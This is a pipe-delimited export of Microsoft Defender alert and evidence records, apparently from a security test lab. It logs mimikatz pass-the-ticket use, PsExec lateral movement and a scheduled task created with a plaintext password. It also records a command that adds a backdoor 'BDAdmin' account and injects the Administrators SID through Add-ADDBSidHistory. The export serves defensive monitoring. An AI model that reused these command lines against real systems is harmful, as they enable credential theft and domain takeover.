null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:48:46.11Z | Suspicious | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 10,120 | netstat -an | 2022-12-22T08:47:28.9856445Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:18:14.6166667Z | Unknown | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:14:45.7033333Z | Suspicious | None | operator | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:15:59.5333333Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | ded8fd7f36417f66eb6ada10e0c0d7c0022986e9 | bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527 | cmd.exe | C:\Windows\System32 | 3,132 | "cmd" /c "net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command "Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \"S-1-5-32-544\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters).\"DSA Database file\"" && net.exe start ntds" | 2022-09-30T06:13:29.1932614Z | 7,308 | 2022-09-30T06:13:28.5321636Z | PSEXESVC.exe | C:\Windows | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:16:01.5966667Z | Suspicious | None | admin | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 8,072 | PSEXESVC.exe | 2022-09-30T06:13:03.9136767Z | 624 | 2022-09-15T03:19:37.3201866Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:19:39.2166667Z | Suspicious | None | ronhd | corp.local | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-08T11:27:28.7866667Z | Suspicious | None | bob | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:03:41.86Z | Suspicious | None | jeff | prod.env | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:05:47.11Z | Suspicious | Active | root | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 1,648 | "mimikatz.exe" privilege::debug "kerberos::ptt C:\M365DAttack\Admin-Tickets" exit | 2022-11-21T02:02:26.7968671Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638044220656140437_-335481736 | da638044220656140437_-335481736 | 752 | MicrosoftDefenderForEndpoint | 2022-11-19T02:34:25.6141633Z | 2022-11-26T01:35:42.9466667Z | 2022-11-26T01:35:42.72Z | 2022-11-19T02:08:50.7662133Z | 2022-11-19T02:08:50.7662133Z | Suspicious URL clicked | A user opened a potentially malicious URL. This alert was triggered based on a Microsoft Defender for Office 365 alert. | InitialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | MTP | 359b36eb-337c-4f1c-b280-8c5e08f9c4a0 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1566.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Medium",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-19T02:34:25.7533333Z",
"fileName": "powershell.exe",
"filePath": "",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-19T02:34:25.7533333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Url",
"evidenceCreationTime": "2022-11-19T02:34:25.7533333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": "http://ggegbcd.companyportal.cloud/accb/hbcbaefjanbegh",
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:20:15.65Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:27:36.8066667Z | Suspicious | None | svc_acct | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072982373210702_507162902 | 5e151cb8-8be1-4c23-9ee4-ca4eb1337686 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T09:30:37.3210927Z | 2022-12-22T09:30:38.0733333Z | null | 2022-12-22T09:26:42.4807406Z | 2022-12-22T09:26:54.5015631Z | Suspicious Scheduled Task Process Launched | A scheduled task pointing to a malicious file or a suspicious command line was launched on this device. Attackers often use scheduled tasks to automatically run malicious code and establish persistence. | Execution | New | Medium | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 0fe2168f-ddd9-4d50-81fc-c05d224c86de | null | null | null | [
"T1053.002",
"T1053.005"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T09:30:37.3433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T09:30:37.3433333Z",
"fileName": "schtasks.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T09:07:41.4690585Z",
"parentProcessFileName": "powershell_ise.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 5408,
"processCommandLine": "\"schtasks.exe\" /CREATE /RU MSDXV8\\RonHD /RP FightingTiger$ /SC DAILY /TN Execute-Notepad.536456477.2022-12-22_09_26_42 /TR C:\\Windows\\system32\\notepad.exe /ST 00:00:00 /F",
"processCreationTime": "2022-12-22T09:26:42.0786601Z",
"processId": 6868,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "ef95ff34f5eb7a36e4dba9d7957811caf738ef53",
"sha256": "812ccfa2d234ef9989e1730976dd8217d0f3107fbd92244454a5fb735051b8db",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "RonHD",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T09:30:37.3433333Z",
"fileName": "notepad.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:52:54.2687409Z",
"parentProcessFileName": "svchost.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 1296,
"processCommandLine": "notepad.exe",
"processCreationTime": "2022-12-22T09:26:54.3892807Z",
"processId": 6444,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "5be67dad56e33cdbd1c327948ee70d43e69ed106",
"sha256": "a28438e1388f272a52559536d99d65ba15b1a8288be1200e249851fdf7ee6c7e",
"url": null,
"userPrincipalName": "ronhd@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T09:30:37.3433333Z",
"fileName": "svchost.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:52:53.3853091Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 680,
"processCommandLine": "svchost.exe -k netsvcs -p -s Schedule",
"processCreationTime": "2022-12-22T08:52:54.2687409Z",
"processId": 1296,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "a1385ce20ad79f55df235effd9780c31442aa234",
"sha256": "7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "RonHD",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T09:30:37.47Z",
"fileName": "notepad.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:52:54.2687409Z",
"parentProcessFileName": "svchost.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 1296,
"processCommandLine": "notepad.exe",
"processCreationTime": "2022-12-22T09:26:42.7815499Z",
"processId": 6796,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "5be67dad56e33cdbd1c327948ee70d43e69ed106",
"sha256": "a28438e1388f272a52559536d99d65ba15b1a8288be1200e249851fdf7ee6c7e",
"url": null,
"userPrincipalName": "ronhd@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:51:01.6233333Z | Suspicious | None | alice | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 9,092 | "net.exe" user /domain | 2022-12-22T08:47:23.0252128Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T04:44:34.51Z | Suspicious | None | Takeshi | TMTOWER-BOOK | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 14,652 | powershell -enc ZABpAHIA | 2022-11-18T04:38:47.8575649Z | 14,616 | 2022-11-14T04:36:16.5242809Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 83b06aa80899050e5d4132992e36b5b8f14b64e9 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T04:51:48.7833333Z | Suspicious | None | Takeshi | evilcorp.cn | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-21T04:54:51.0633333Z | Suspicious | None | user1 | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1107 | null | steve@msdxv8.m365dpoc.com | 0a43ff3773e7fcbb9a98029957c41bc3af56ae94 | d2ae715f046aec3fccbfb4fe9624fa0c5b5cf45622ca2ace26de9f56552aebe2 | chrome.exe | C:\Program Files\Google\Chrome\Application | 8,484 | "chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1976,i,13955870628857054219,17124713631631460900,131072 /prefetch:8 | 2022-12-21T04:51:23.3612459Z | 10,380 | 2022-12-21T04:51:21.968849Z | chrome.exe | C:\Program Files\Google\Chrome\Application | Detected | 4f111b3b2366eacdcc66d7ad73548fff9b039c15 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T10:44:52.1566667Z | Benign | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:24:37.89Z | Unknown | None | ronhd | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-12T09:28:24.68Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043440642437868_-610099889 | e43d8a36-49ea-4c83-8ca8-1cc8f9c3796d | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T04:54:24.2438047Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T04:37:10.8013687Z | 2022-11-18T04:48:53.9601178Z | PsExec launched a command on a remote device | PsExec was used to launch a command on a remote device. PsExec is a tool used to launch programs on remote, or local devices. An attacker might be leveraging this tool to launch malicious commands to a remote device and move laterally in the organization. | LateralMovement | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 40eca4c4-8854-418a-8024-fff7c9d7b077 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1021",
"T1021.002",
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "tmtower-book",
"firstSeen": "2022-10-10T06:18:04.255Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Takeshi",
"domainName": "TMTOWER-BOOK"
}
],
"mdatpDeviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"onboardingStatus": "Onboarded",
"osBuild": 22621,
"osPlatform": "Windows11",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Critical",
"tags": [],
"version": "22H2",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": null,
"deviceId": null,
"domainName": "TMTOWER-BOOK",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T04:54:24.2666667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": "Detected",
"deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"domainName": "TMTOWER-BOOK",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T04:54:24.2666667Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Import-Module 'c:\\Users\\Takeshi\\.vscode\\extensions\\ms-vscode.powershell-2022.8.5\\modules\\PowerShellEditorServices\\PowerShellEditorServices.psd1'; Start-EditorServices -HostName 'Visual Studio Code Host' -HostProfileId 'Microsoft.VSCode' -HostVersion '2022.8.5' -AdditionalModules @('PowerShellEditorServices.VSCode') -BundledModulesPath 'c:\\Users\\Takeshi\\.vscode\\extensions\\ms-vscode.powershell-2022.8.5\\modules' -EnableConsoleRepl -StartupBanner \\\"PowerShell Extension v2022.8.5\nCopyright (c) Microsoft Corporation.\n\nhttps://aka.ms/vscode-powershell\nType 'help' to get help.\n\\\" -LogLevel 'Normal' -LogPath 'c:\\Users\\Takeshi\\AppData\\Roaming\\Code\\User\\globalStorage\\ms-vscode.powershell\\logs\\1668400572-3c88b720-7963-4dd6-aba1-3456f669fe051668400566006\\EditorServices.log' -SessionDetailsPath 'c:\\Users\\Takeshi\\AppData\\Roaming\\Code\\User\\globalStorage\\ms-vscode.powershell\\sessions\\PSES-VSCode-11004-905307.json' -FeatureFlags @() \"",
"processCreationTime": "2022-11-14T04:36:16.5242809Z",
"processId": 14616,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "9678ea8069d9812cda2a41c9d3dc32d5c4555b7b",
"sha256": "529ee9d30eef7e331b24e66d68205ab4554b6eb3487193d53ed3a840ca7dde5d",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": "Detected",
"deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"domainName": "TMTOWER-BOOK",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T04:54:24.2666667Z",
"fileName": "PsExec.exe",
"filePath": "C:\\M365DAttack\\PsTools",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-14T04:36:16.5242809Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 14616,
"processCommandLine": "\"PsExec.exe\" \\\\tmtower-book-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-18T04:48:53.9385619Z",
"processId": 17856,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "b97761358338e640a31eef5e5c5773b633890914",
"sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:20:01.6733333Z | Suspicious | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 2,596 | netstat -an | 2022-09-30T06:11:52.7127433Z | 4,064 | 2022-09-30T06:11:13.210308Z | powershell.exe | \Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
ed638042112640429048_-201844297 | ed638042112640429048_-201844297 | 731 | MicrosoftDefenderForEndpoint | 2022-11-16T16:01:04.0430499Z | 2022-11-16T16:13:19.7266667Z | 2022-11-16T16:13:19.4204429Z | 2022-11-16T04:56:27.3618891Z | 2022-11-16T04:56:27.3618891Z | Test ASR | test123 | InitialAccess | Resolved | High | 43 | Benign | null | null | CustomDetection | f9135d0a-11d9-4858-af84-9c5cff54a437 | null | null | null | [
"T1189",
"T1133",
"T1190",
"T1078.003"
] | [
{
"aadDeviceId": "7711ee94-033f-495e-bc7a-53e7c1e57111",
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-win10a.msdxv2.m365dpoc.com",
"firstSeen": "2022-09-19T08:40:31.865Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "252919130a29cc07e305c5c4ef99e5435b96b889",
"onboardingStatus": "Onboarded",
"osBuild": 22000,
"osPlatform": "Windows11",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "21H2",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10A",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "77cf6d06-c483-4fb3-a859-9bbd9c9ac8e2"
}
}
] | [
{
"aadUserId": null,
"accountName": "system",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-16T16:01:04.1333333Z",
"fileName": "WaAppAgent.exe",
"filePath": "C:\\WindowsAzure\\GuestAgent_2.7.41491.1071_2022-10-12_040513",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T04:52:37.3682423Z",
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": 632,
"processCommandLine": "WaAppAgent.exe",
"processCreationTime": "2022-11-16T04:52:44.6944805Z",
"processId": 2336,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "1521f019fe55cffe753941d0fb207004db26ea8f",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-16T16:01:04.1333333Z",
"fileName": "WaAppAgent.exe",
"filePath": "C:\\WindowsAzure\\GuestAgent_2.7.41491.1071_2022-10-12_040513",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
